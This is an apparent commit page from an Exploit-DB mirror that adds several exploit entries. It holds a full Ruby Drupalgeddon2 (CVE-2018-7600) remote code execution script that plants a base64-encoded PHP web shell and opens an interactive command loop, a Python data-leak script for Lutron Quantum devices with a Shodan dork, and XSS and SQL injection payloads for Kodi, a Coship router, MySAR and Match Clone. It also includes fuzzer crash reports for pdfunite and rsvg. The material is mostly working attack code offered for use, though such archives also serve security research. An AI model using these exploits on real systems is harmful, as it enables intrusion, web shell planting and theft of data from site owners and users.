bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-04-19

Browse source 
14 changes to exploits/shellcodes

PDFunite 0.41.0 - '.pdf' Local Buffer Overflow
RSVG 2.40.13 / 2.42.2 - '.svg' Buffer Overflow
VX Search 10.6.18 - 'directory' Local Buffer Overflow

Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)
Easy File Sharing Web Server 7.2 - Stack Buffer Overflow

Coship RT3052 Wireless Router - Persistent Cross-Site Scripting

Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting
Rvsitebuilder CMS - Database Backup Download
Match Clone Script 1.0.4 - Cross-Site Scripting
Kodi 17.6 - Persistent Cross-Site Scripting
Lutron Quantum 2.0 - 3.2.243 - Information Disclosure
WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting
Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery
Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2018-04-19 05:01:48 +00:00
parent d0cba5625f
commit e8f4ef9188
15 changed files with 1103 additions and 100 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

26
exploits/hardware/webapps/44320.txt Normal file
View file

@ -0,0 +1,26 @@
######################################################################################
# Exploit Title: Coship RT3052 Wireless Router - Persistent Cross Site Scripting (XSS)
# Date: 2018-03-18
# Exploit Author: Sayan Chatterjee
# Vendor Homepage: http://en.coship.com/
# Category: Hardware (Wifi Router)
# Version: 4.0.0.48
# Tested on: Windows 10
# CVE: CVE-2018-8772
#######################################################################################
Proof of Concept
=================
URL: http://192.168.1.254 (Wifi Router Gateway)
Attack Vector : Network Name(SSID)
Payload : <script>alert("S@Y@N")</script>
Reproduction Steps:
------------------------------
1. Access the wifi router gateway [i.e, http://192.168.1.254]
2. Go to "Wireless Setting" -> "Basic"
3. Update "Network Name(SSID)" field with '<script>alert("S@Y@N")</script>'
4. Save the settings.
5. Go to "System Status" and you will be having "S@Y@N" popup.
#######################################################################################

69
exploits/hardware/webapps/44488.py Executable file
View file

@ -0,0 +1,69 @@
'''
# Exploit Title: Login bypass and data leak - Lutron Quantum 2.0 - 3.2.243 firmware
# Date: 20-03-2018
# Exploit Author: David Castro
# Contact: https://twitter.com/SadFud75
# Vendor Homepage: http://www.lutron.com
# Software Link: http://www.lutron.com/en-US/Products/Pages/WholeBuildingSystems/Quantum/Overview.aspx
# Version: Lutron Quantum 2.0 - 3.2.243 firmware
# CVE : CVE-2018-8880
# Shodan dork: html:"<h1>LUTRON</h1>"
Python 2.7 Output:
Leaking data from HOST
[+] Device info:
MAC: 000FE702A999
PRODUCT FAMILY: Gulliver
PRODUCT TYPE: Processor
SERIAL NUMBER: 007B24B4
GUID: 0DFB959BD0D8784DA9501B958F099779
CODE VERSION: 7.5.0
[+] Network info:
INTERNAL IP: 192.168.0.2
SUBNET MASK: 255.255.255.0
GATEWAY: 192.168.0.1
TELNET PORT: 23
FTP PORT: 21
REMOTE PORT: 51023
[+] Done.
'''
import requests
from bs4 import BeautifulSoup
ip = raw_input("Enter target ip: ")
port = raw_input("Enter target port: ")
print 'Leaking data from ' + 'http://' + ip + ":" + port
r = requests.get('http://' + ip + ":" + port + '/deviceIP')
resultado = r.text
parseado = BeautifulSoup(resultado, "lxml")
print '[+] Device info:'
print ''
print 'MAC: ' + parseado.find('input', {'name': 'MacAddr'}).get('value')
print 'PRODUCT FAMILY: ' + parseado.find('input', {'name': 'PRODFAM'}).get('value')
print 'PRODUCT TYPE: ' + parseado.find('input', {'name': 'PRODTYPE'}).get('value')
print 'SERIAL NUMBER: ' + parseado.find('input', {'name': 'SERNUM'}).get('value')
print 'GUID: ' + parseado.find('input', {'name': 'GUID'}).get('value')
print 'CODE VERSION: ' + parseado.find('input', {'name': 'CODEVER'}).get('value')
print ''
print '[+] Network info:'
print ''
print 'INTERNAL IP: ' + parseado.find('input', {'name': 'IPADDR'}).get('value')
print 'SUBNET MASK: ' + parseado.find('input', {'name': 'SUBNETMK'}).get('value')
print 'GATEWAY: ' + parseado.find('input', {'name': 'GATEADDR'}).get('value')
print 'TELNET PORT: ' + parseado.find('input', {'name': 'TELPORT'}).get('value')
print 'FTP PORT: ' + parseado.find('input', {'name': 'FTPPORT'}).get('value')
print 'REMOTE PORT: ' + parseado.find('input', {'name': 'REMOTEPORT'}).get('value')
print ''
print '[+] Done.'
print ''

68
exploits/linux/dos/44490.txt Normal file
View file

@ -0,0 +1,68 @@
# Exploit Title: PDFunite Malformed pdf buffer overflow
# Date: 17 April 2018
# Exploit Author: Hamm3r.py
# Vendor Homepage: https://launchpad.net/ubuntu/artful/+package/poppler-utils
# Software Link: https://launchpad.net/ubuntu/+source/poppler/0.57.0-2ubuntu4.2
# Version: 0.41.0
# Tested on: Ubuntu
# CVE :
pdfunite is a part of poppler package in ubuntu. pdfunite is prone to a
local bufferoverflow when a malformed pdf is used to unite with another
pdf.
Following is the gdb stack trace:
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7abf948 in XRef::getEntry(int, bool) () from
/usr/lib/x86_64-linux-gnu/libpoppler.so.58
#0 0x00007ffff7abf948 in XRef::getEntry(int, bool) () from
/usr/lib/x86_64-linux-gnu/libpoppler.so.58
#1 0x00007ffff7aa8867 in PDFDoc::markObject(Object*, XRef*, XRef*,
unsigned int, int, int, std::set<Dict*, std::less<Dict*>,
std::allocator<Dict*> >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
#2 0x00007ffff7aa85a3 in PDFDoc::markDictionnary(Dict*, XRef*, XRef*,
unsigned int, int, int, std::set<Dict*, std::less<Dict*>,
std::allocator<Dict*> >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
#3 0x00007ffff7aa884c in PDFDoc::markObject(Object*, XRef*, XRef*,
unsigned int, int, int, std::set<Dict*, std::less<Dict*>,
std::allocator<Dict*> >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
#4 0x00007ffff7aa8971 in PDFDoc::markObject(Object*, XRef*, XRef*,
unsigned int, int, int, std::set<Dict*, std::less<Dict*>,
std::allocator<Dict*> >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
#5 0x00007ffff7aa85a3 in PDFDoc::markDictionnary(Dict*, XRef*, XRef*,
unsigned int, int, int, std::set<Dict*, std::less<Dict*>,
std::allocator<Dict*> >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
#6 0x00007ffff7aa884c in PDFDoc::markObject(Object*, XRef*, XRef*,
unsigned int, int, int, std::set<Dict*, std::less<Dict*>,
std::allocator<Dict*> >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
#7 0x00007ffff7aa8971 in PDFDoc::markObject(Object*, XRef*, XRef*,
unsigned int, int, int, std::set<Dict*, std::less<Dict*>,
std::allocator<Dict*> >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
#8 0x00007ffff7aa85a3 in PDFDoc::markDictionnary(Dict*, XRef*, XRef*,
unsigned int, int, int, std::set<Dict*, std::less<Dict*>,
std::allocator<Dict*> >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
#9 0x00007ffff7aa884c in PDFDoc::markObject(Object*, XRef*, XRef*,
unsigned int, int, int, std::set<Dict*, std::less<Dict*>,
std::allocator<Dict*> >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
#10 0x00007ffff7aa8bae in PDFDoc::markPageObjects(Dict*, XRef*, XRef*,
unsigned int, int, int, std::set<Dict*, std::less<Dict*>,
std::allocator<Dict*> >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
#11 0x000000000040271a in ?? ()
#12 0x00007ffff722d830 in __libc_start_main (main=0x401b20, argc=4,
argv=0x7fffffffe0b8, init=<optimized out>, fini=<optimized out>,
rtld_fini=<optimized out>, stack_end=0x7fffffffe0a8) at
../csu/libc-start.c:291
#13 0x0000000000403179 in ?? ()
$ pdfunite -v
pdfunite version 0.41.0
#This issue is identified by Hamm3r.py, a general purpose fuzzer!
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44490.zip

100
exploits/multiple/dos/44491.txt Normal file
View file

@ -0,0 +1,100 @@
# Exploit Title: Buffer-overflow in RSVG while converting a malformed svg
# Date: 17 April 2018
# Exploit Author: Hamm3r.py
# Vendor Homepage: *https://launchpad.net/ubuntu/xenial/+package/librsvg2-bin
# Software Link: *https://launchpad.net/ubuntu/xenial/+package/librsvg2-bin
# Version: Ubuntu: 2.40.13 (Default version that is shipped with ubuntu) and MAC 2.42.2
# Tested on: Ubuntu 16.04 and MAC 10.13.3
RSVG throws a segmentation fault when malformed SVG is submitted as input.
Steps to reproduce:
rsvg test.png
GDB Stacktrace below:
Starting program: /usr/bin/rsvg fuzzed_fdiA0xdf5OQPYsN hello.png
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
_fill_xrgb32_lerp_opaque_spans (abstract_renderer=0x7fffffffbea0, y=18219,
h=1, spans=<optimized out>,
num_spans=<optimized out>) at
../../../../src/cairo-image-compositor.c:2249
2249 ../../../../src/cairo-image-compositor.c: No such file or directory.
(gdb) backtrace
#0 0x00007ffff6fd35c0 in _fill_xrgb32_lerp_opaque_spans
(abstract_renderer=0x7fffffffbea0, y=18219, h=1, spans=<optimized out>,
num_spans=<optimized out>) at ../../../../src/cairo-image-compositor.c:2249
#1 0x00007ffff7017921 in _cairo_tor_scan_converter_generate (xmax=248,
xmin=192, height=1, y=18219, spans=0x63e438, renderer=0x7fffffffbea0,
cells=<optimized out>)
at ../../../../src/cairo-tor-scan-converter.c:1643
#2 0x00007ffff7017921 in _cairo_tor_scan_converter_generate
(renderer=0x7fffffffbea0, antialias=1, winding_mask=<optimized out>,
converter=<optimized out>) at
../../../../src/cairo-tor-scan-converter.c:1794
#3 0x00007ffff7017921 in _cairo_tor_scan_converter_generate
(converter=0x63d3b0, renderer=0x7fffffffbea0)
at ../../../../src/cairo-tor-scan-converter.c:1857
#4 0x00007ffff7009c33 in composite_polygon
(extents=extents@entry=0x7fffffffd780,
polygon=polygon@entry=0x7fffffffd360,
fill_rule=fill_rule@entry=CAIRO_FILL_RULE_WINDING,
antialias=antialias@entry=CAIRO_ANTIALIAS_DEFAULT,
compositor=0x7ffff72b2040 <spans>, compositor=0x7ffff72b2040 <spans>)
at ../../../../src/cairo-spans-compositor.c:801
#5 0x00007ffff700a6a5 in clip_and_composite_polygon
(compositor=compositor@entry=0x7ffff72b2040 <spans>,
extents=extents@entry=0x7fffffffd780,
polygon=polygon@entry=0x7fffffffd360, fill_rule=CAIRO_FILL_RULE_WINDING,
antialias=antialias@entry=CAIRO_ANTIALIAS_DEFAULT) at
../../../../src/cairo-spans-compositor.c:967
#6 0x00007ffff700b5d3 in _cairo_spans_compositor_fill
(_compositor=0x7ffff72b2040 <spans>, extents=0x7fffffffd780,
path=<optimized out>, fill_rule=CAIRO_FILL_RULE_WINDING,
tolerance=0.10000000000000001, antialias=CAIRO_ANTIALIAS_DEFAULT) at
../../../../src/cairo-spans-compositor.c:1174
#7 0x00007ffff6fc5a90 in _cairo_compositor_fill (compositor=0x7ffff72b2040
<spans>, surface=0x6399a0, op=<optimized out>, source=<optimized out>,
path=0x639768, fill_rule=CAIRO_FILL_RULE_WINDING,
tolerance=0.10000000000000001, antialias=CAIRO_ANTIALIAS_DEFAULT, clip=0x0)
at ../../../../src/cairo-compositor.c:203
#8 0x00007ffff6fd7127 in _cairo_image_surface_fill
(abstract_surface=<optimized out>, op=<optimized out>, source=<optimized
out>, path=<optimized out>, fill_rule=<optimized out>, tolerance=<optimized
out>, antialias=<optimized out>, clip=0x0) at
../../../../src/cairo-image-surface.c:985
#9 0x00007ffff700e7d7 in _cairo_surface_fill (surface=0x6399a0,
op=CAIRO_OPERATOR_OVER, source=0x7fffffffdb50, path=0x639768,
fill_rule=CAIRO_FILL_RULE_WINDING, tolerance=0.10000000000000001,
antialias=CAIRO_ANTIALIAS_DEFAULT, clip=0x0) at
../../../../src/cairo-surface.c:2341
#10 0x00007ffff6fce14c in _cairo_gstate_fill (gstate=0x630c00,
path=path@entry=0x639768)
at ../../../../src/cairo-gstate.c:1317
#11 0x00007ffff6fc7279 in _cairo_default_context_fill (abstract_cr=0x639400)
at ../../../../src/cairo-default-context.c:1055
#12 0x00007ffff6fc02b5 in cairo_fill (cr=0x639400) at
../../../../src/cairo.c:2205
#13 0x00007ffff7bc9e95 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
#14 0x00007ffff7bc6272 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
#15 0x00007ffff7bbd4c0 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
#16 0x00007ffff7bbd4c0 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
#17 0x00007ffff7bbd982 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
#18 0x00007ffff7bbe298 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
#19 0x00007ffff7bca9e3 in rsvg_handle_render_cairo_sub () at
/usr/lib/x86_64-linux-gnu/librsvg-2.so.2
Version:
$rsvg-convert --version
rsvg-convert version 2.42.2
#This issue is identified by Hamm3r.py, a general purpose fuzzer!
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44491.zip

82
exploits/multiple/webapps/44487.txt Normal file
View file

@ -0,0 +1,82 @@
=============================================
MGC ALERT 2018-003
- Original release date: March 19, 2018
- Last revised: April 16, 2018
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
- CVE-ID: CVE-2018-8831
=============================================
I. VULNERABILITY
-------------------------
Kodi <= 17.6 - Persistent Cross-Site Scripting
II. BACKGROUND
-------------------------
Kodi (formerly XBMC) is a free and open-source media player software
application developed by the XBMC Foundation, a non-profit technology
consortium. Kodi is available for multiple operating systems and hardware
platforms, with a software 10-foot user interface for use with televisions
and remote controls.
III. DESCRIPTION
-------------------------
Has been detected a Persistent XSS vulnerability in the web interface of
Kodi, that allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser.
IV. PROOF OF CONCEPT
-------------------------
Go to: Playlist -> Create
Create a playlist injecting javascript code:
<img src=x onerror=alert(1)>
The XSS is executed, in the victim browser.
V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.
VI. SYSTEMS AFFECTED
-------------------------
Kodi <= 17.6
VII. SOLUTION
-------------------------
Vendor include the fix:
https://trac.kodi.tv/ticket/17814
VIII. REFERENCES
-------------------------
https://kodi.tv/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
March 19, 2018 1: Initial release
April 16, 2018 2: Last revision
XI. DISCLOSURE TIMELINE
-------------------------
March 19, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
March 19, 2018 2: Send to vendor
March 30, 2018 3: Vendo fix
April 16, 2018 4: Sent to lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

362
exploits/php/webapps/44449.rb
View file

@ -1,27 +1,10 @@
#!/usr/bin/env ruby
#
# Hans Topo & g0tmi1k's ruby port of Drupalggedon2 exploit ~ https://github.com/dreadlocked/Drupalgeddon2/ (EDBID: 44449 ~ https://www.exploit-db.com/exploits/44449/)
# Based on Vitalii Rudnykh exploit ~ https://github.com/a2u/CVE-2018-7600 (EDBID: 44448 ~ https://www.exploit-db.com/exploits/44448/)
# Hans Topo ~ https://github.com/dreadlocked
# g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
# [CVE-2018-7600] Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
#
# Drupal Advisory ~ https://www.drupal.org/sa-core-2018-002
# Vulnerable Versions:
# < 7.58
# 8.x < 8.3.9
# 8.4.x < 8.4.6 (TESTED)
# 8.5.x < 8.5.1 (TESTED)
#
# WriteUp & Thx ~ https://research.checkpoint.com/uncovering-drupalgeddon-2/
# REF phpinfo() ~ https://twitter.com/i_bo0om/status/984674893768921089 (curl - user/register - mail - #post_render)
# REF phpinfo() ~ https://twitter.com/RicterZ/status/984495201354854401 (burp - user/<id>/edit [requires auth] - mail - #lazy_builder)
# REF 2x RCE ~ https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708 (curl - user/register - mail & timezone - #lazy_builder & #post_render)
# REF RCE ~ https://gist.github.com/AlbinoDrought/626c07ee96bae21cb174003c9c710384 (curl - user/register - mail - #post_render)
# REF rev_nc ~ https://gist.github.com/AlbinoDrought/2854ca1b2a9a4f33ca87581cf1e1fdd4 (curl - user/register - mail - #post_render)
# Collection ~ https://github.com/g0rx/CVE-2018-7600-Drupal-RCE
#
#
# Drupal Version ~ https://example.com/CHANGELOG.txt
# Authors:
# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked
# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
#
@ -29,114 +12,297 @@ require 'base64'
require 'json'
require 'net/http'
require 'openssl'
require 'readline'
# Proxy information (nil to disable)
# Settings - Proxy information (nil to disable)
proxy_addr = nil
proxy_port = 8080
# Quick how to use
if ARGV.empty?
puts "Usage: ruby drupalggedon2.rb <target> <command>"
puts " ruby drupalgeddon2.rb https://example.com whoami"
exit
# Settings - General
$useragent = "drupalgeddon2"
webshell = "s.php"
writeshell = true
# Settings - Payload (we could just be happy without this, but we can do better!)
#bashcmd = "<?php if( isset( $_REQUEST[c] ) ) { eval( $_GET[c]) ); } ?>'
bashcmd = "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }"
bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Function http_post <url> [post]
def http_post(url, payload="")
uri = URI(url)
request = Net::HTTP::Post.new(uri.request_uri)
request.initialize_http_header({"User-Agent" => $useragent})
request.body = payload
return $http.request(request)
end
# Function gen_evil_url <cmd>
def gen_evil_url(evil, feedback=true)
# PHP function to use (don't forget about disabled functions...)
phpmethod = $drupalverion.start_with?('8')? "exec" : "passthru"
#puts "[*] PHP cmd: #{phpmethod}" if feedback
puts "[*] Payload: #{evil}" if feedback
## Check the version to match the payload
# Vulnerable Parameters: #access_callback / #lazy_builder / #pre_render / #post_render
if $drupalverion.start_with?('8')
# Method #1 - Drupal 8, mail, #post_render - response is 200
url = $target + "user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
# Method #2 - Drupal 8, timezone, #lazy_builder - response is 500 & blind (will need to disable target check for this to work!)
#url = $target + "user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
#payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil
elsif $drupalverion.start_with?('7')
# Method #3 - Drupal 7, name, #post_render - response is 200
url = $target + "?q=user/password&name[%23post_render][]=" + phpmethod + "&name[%23type]=markup&name[%23markup]=" + evil
payload = "form_id=user_pass&_triggering_element_name=name"
else
puts "[!] Unsupported Drupal version"
exit
end
# Drupal v7 needs an extra value from a form
if $drupalverion.start_with?('7')
response = http_post(url, payload)
form_build_id = response.body.match(/input type="hidden" name="form_build_id" value="(.*)"/).to_s().slice(/value="(.*)"/, 1).to_s.strip
puts "[!] WARNING: Didn't detect form_build_id" if form_build_id.empty?
#url = $target + "file/ajax/name/%23value/" + form_build_id
url = $target + "?q=file/ajax/name/%23value/" + form_build_id
payload = "form_build_id=" + form_build_id
end
return url, payload
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Quick how to use
if ARGV.empty?
puts "Usage: ruby drupalggedon2.rb <target>"
puts " ruby drupalgeddon2.rb https://example.com"
exit
end
# Read in values
target = ARGV[0]
command = ARGV[1]
$target = ARGV[0]
# Check input for protocol
if not $target.start_with?('http')
$target = "http://#{target}"
end
# Check input for the end
if not $target.end_with?('/')
$target += "/"
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Banner
puts "[*] --==[::#Drupalggedon2::]==--"
puts "-"*80
puts "[*] Target : #{$target}"
puts "[*] Write? : Skipping writing web shell" if not writeshell
puts "-"*80
# Check input for protocol
if not target.start_with?('http')
target = "http://" + target
end
# Check input for the end
if not target.end_with?('/')
target += "/"
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Payload
#evil = 'uname -a'
evil = '<?php system($_GET["c"]); ?>'
evil = "echo " + Base64.encode64(evil).strip + " | base64 -d | tee s.php"
# Setup connection
uri = URI($target)
$http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)
# PHP function to use
phpmethod = 'exec'
# Feedback
puts "[*] Target : " + target
puts "[*] Command: " + command
puts "[*] PHP cmd: " + phpmethod
# Method #1 - timezone & lazy_builder - response is 500 & blind (will need to disable target check for this to work!)
#url = target + 'user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
# Vulnerable Parameters: access_callback / lazy_builder / pre_render/ post_render
#payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil
# Method #2 - mail & post_render - response is 200
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
# Vulnerable Parameters: access_callback / lazy_builder / pre_render/ post_render
payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
uri = URI(url)
http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)
# Use SSL/TLS if needed
if uri.scheme == 'https'
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
if uri.scheme == "https"
$http.use_ssl = true
$http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Try and get version
$drupalverion = nil
# Possible URLs
url = [
$target + "CHANGELOG.txt",
$target + "core/CHANGELOG.txt",
$target + "includes/bootstrap.inc",
$target + "core/includes/bootstrap.inc",
]
# Check all
url.each do|uri|
# Check response
response = http_post(uri)
if response.code == "200"
puts "[+] Found : #{uri} (#{response.code})"
# Patched already?
puts "[!] WARNING: Might be patched! Found SA-CORE-2018-002: #{url}" if response.body.include? "SA-CORE-2018-002"
# Try and get version from the file contents
$drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip
# If not, try and get it from the URL
$drupalverion = uri.match(/core/)? "8.x" : "7.x" if $drupalverion.empty?
# Done!
break
elsif response.code == "403"
puts "[+] Found : #{uri} (#{response.code})"
# Get version from URL
$drupalverion = uri.match(/core/)? "8.x" : "7.x"
else
puts "[!] MISSING: #{uri} (#{response.code})"
end
end
# Make the request
req = Net::HTTP::Post.new(uri.request_uri)
req.body = payload
# Feedback
puts "[*] Payload: " + evil
#puts "[*] Sending: " + payload
puts "-"*80
# Check response
response = http.request(req)
if response.code == "200"
puts "[+] Target seems to be exploitable! w00hooOO!"
puts "[+] Result: " + JSON.pretty_generate(JSON[response.body] )
if $drupalverion
status = $drupalverion.end_with?('x')? "?" : "!"
puts "[+] Drupal#{status}: #{$drupalverion}"
else
puts "[!] Target does NOT seem to be exploitable ~ Response: " + response.code
#exit
puts "[!] Didn't detect Drupal version"
puts "[!] Forcing Drupal v8.x attack"
$drupalverion = "8.x"
end
# Feedback
puts "-"*80
puts "[*] curl '" + target + "s.php?c=#{command}'"
puts "-"*80
# Now run our command
exploit_uri = URI(target + "s.php?c=#{command}")
# Check response
response = Net::HTTP.get_response(exploit_uri)
if response.code != "200"
puts "[!] Exploit FAILED ~ Response: " + response.code
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Make a request, testing code execution
puts "[*] Testing: Code Execution"
# Generate a random string to see if we can echo it
random = (0...8).map { (65 + rand(26)).chr }.join
url, payload = gen_evil_url("echo #{random}")
response = http_post(url, payload)
if response.code == "200" and not response.body.empty?
#result = JSON.pretty_generate(JSON[response.body])
result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
puts "[+] Result : #{result}"
puts response.body.match(/#{random}/)? "[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!" : "[+] Target might to be exploitable?"
else
puts "[!] Target is NOT exploitable ~ HTTP Response: #{response.code}"
exit
end
puts "-"*80
# Result
puts "[+] Output: " + response.body
# Location of web shell & used to signal if using PHP shell
webshellpath = nil
prompt = "drupalgeddon2"
# Possibles paths to try
paths = [
"./",
"./sites/default/",
"./sites/default/files/",
]
# Check all
paths.each do|path|
puts "[*] Testing: File Write To Web Root (#{path})"
# Merge locations
webshellpath = "#{path}#{webshell}"
# Final command to execute
cmd = "#{bashcmd} | tee #{webshellpath}"
# Generate evil URLs
url, payload = gen_evil_url(cmd)
# Make the request
response = http_post(url, payload)
# Check result
if response.code == "200" and not response.body.empty?
# Feedback
#result = JSON.pretty_generate(JSON[response.body])
result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
puts "[+] Result : #{result}"
# Test to see if backdoor is there (if we managed to write it)
response = http_post("#{$target}#{webshellpath}", "c=hostname")
if response.code == "200" and not response.body.empty?
puts "[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!"
break
else
puts "[!] Target is NOT exploitable. No write access here!"
end
else
puts "[!] Target is NOT exploitable for some reason ~ HTTP Response: #{response.code}"
end
webshellpath = nil
end if writeshell
puts "-"*80 if writeshell
if webshellpath
# Get hostname for the prompt
prompt = response.body.to_s.strip
# Feedback
puts "[*] Fake shell: curl '#{$target}#{webshell}' -d 'c=whoami'"
elsif writeshell
puts "[!] FAILED to find writeable folder"
puts "[*] Dropping back to ugly shell..."
end
# Stop any CTRL + C action ;)
trap("INT", "SIG_IGN")
# Forever loop
loop do
# Default value
result = "ERROR"
# Get input
command = Readline.readline("#{prompt}>> ", true).to_s
# Exit
break if command =~ /exit/
# Blank link?
next if command.empty?
# If PHP shell
if webshellpath
# Send request
result = http_post("#{$target}#{webshell}", "c=#{command}").body
# Direct commands
else
url, payload = gen_evil_url(command, false)
response = http_post(url, payload)
if response.code == "200" and not response.body.empty?
result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
end
end
# Feedback
puts result
end

24
exploits/php/webapps/44483.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: MySQL Squid Access Report 2.1.4 Multiple Vulnerabilities
# Date: 14-13-2018
# Software Link: https://sourceforge.net/projects/mysar/
# Exploit Author: Keerati T.
# Version: 2.1.4
# Tested on: Linux
1. Description
SQL injection and Cross site script vulnerabilities are found on ALL
parameter of MySAR.
2. Proof of Concept
FOR EXAMPLE
- SQL injection
http://server/mysar/index.php?a=IPSummary&date=[SQLi]
-XSS
http://server/mysar/index.php?a=IPSummary&date=2018-04-14
"><script>alert(1)</script>
3. Timeline
8-3-2018 - Report on their Github. (
https://github.com/coffnix/mysar-ng/issues/12)
-- 1 month later, no any response from vendor. --
14-4-2018 - Public.

13
exploits/php/webapps/44484.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: Rvsitebuilder CMS Database Backup Download
# Exploit Author: Hesam Bazvand
# Contact: black.king066@gmail.com
# Software Link: http://www.rvsitebuilder.com
# Version: All Version
# Tested on: Windows 7 / Kali Linux
# Category: WebApps
# Dork : inurl:rvsindex.php & /rvsindex.php?/user/login
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
Exploit :
Http://Target/rvsDbBackup.sql

28
exploits/php/webapps/44486.txt Normal file
View file

@ -0,0 +1,28 @@
########################################################################
# Exploit Title: Match Clone Script 1.0.4 - Cross-Site Scripting
# Date: 23.02.2018
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/match-clone/
# Category: Web Application
# Exploit Author: ManhNho
# Version: 1.0.4
# Tested on: Window 10 / Kali Linux
# CVE: CVE-2018-9857
##########################################################################
Description
------------------------
PHP Scripts Mall Match Clone Script 1.0.4 has XSS via the search field to
searchbyid.php (aka the "View Search By Id" screen).
Proof of Concept
------------------------
1. Access to site
2. Choose “Search”
3. Choose "View Search By Id"
3. Put <script>alert('ManhNho')</script> in search field
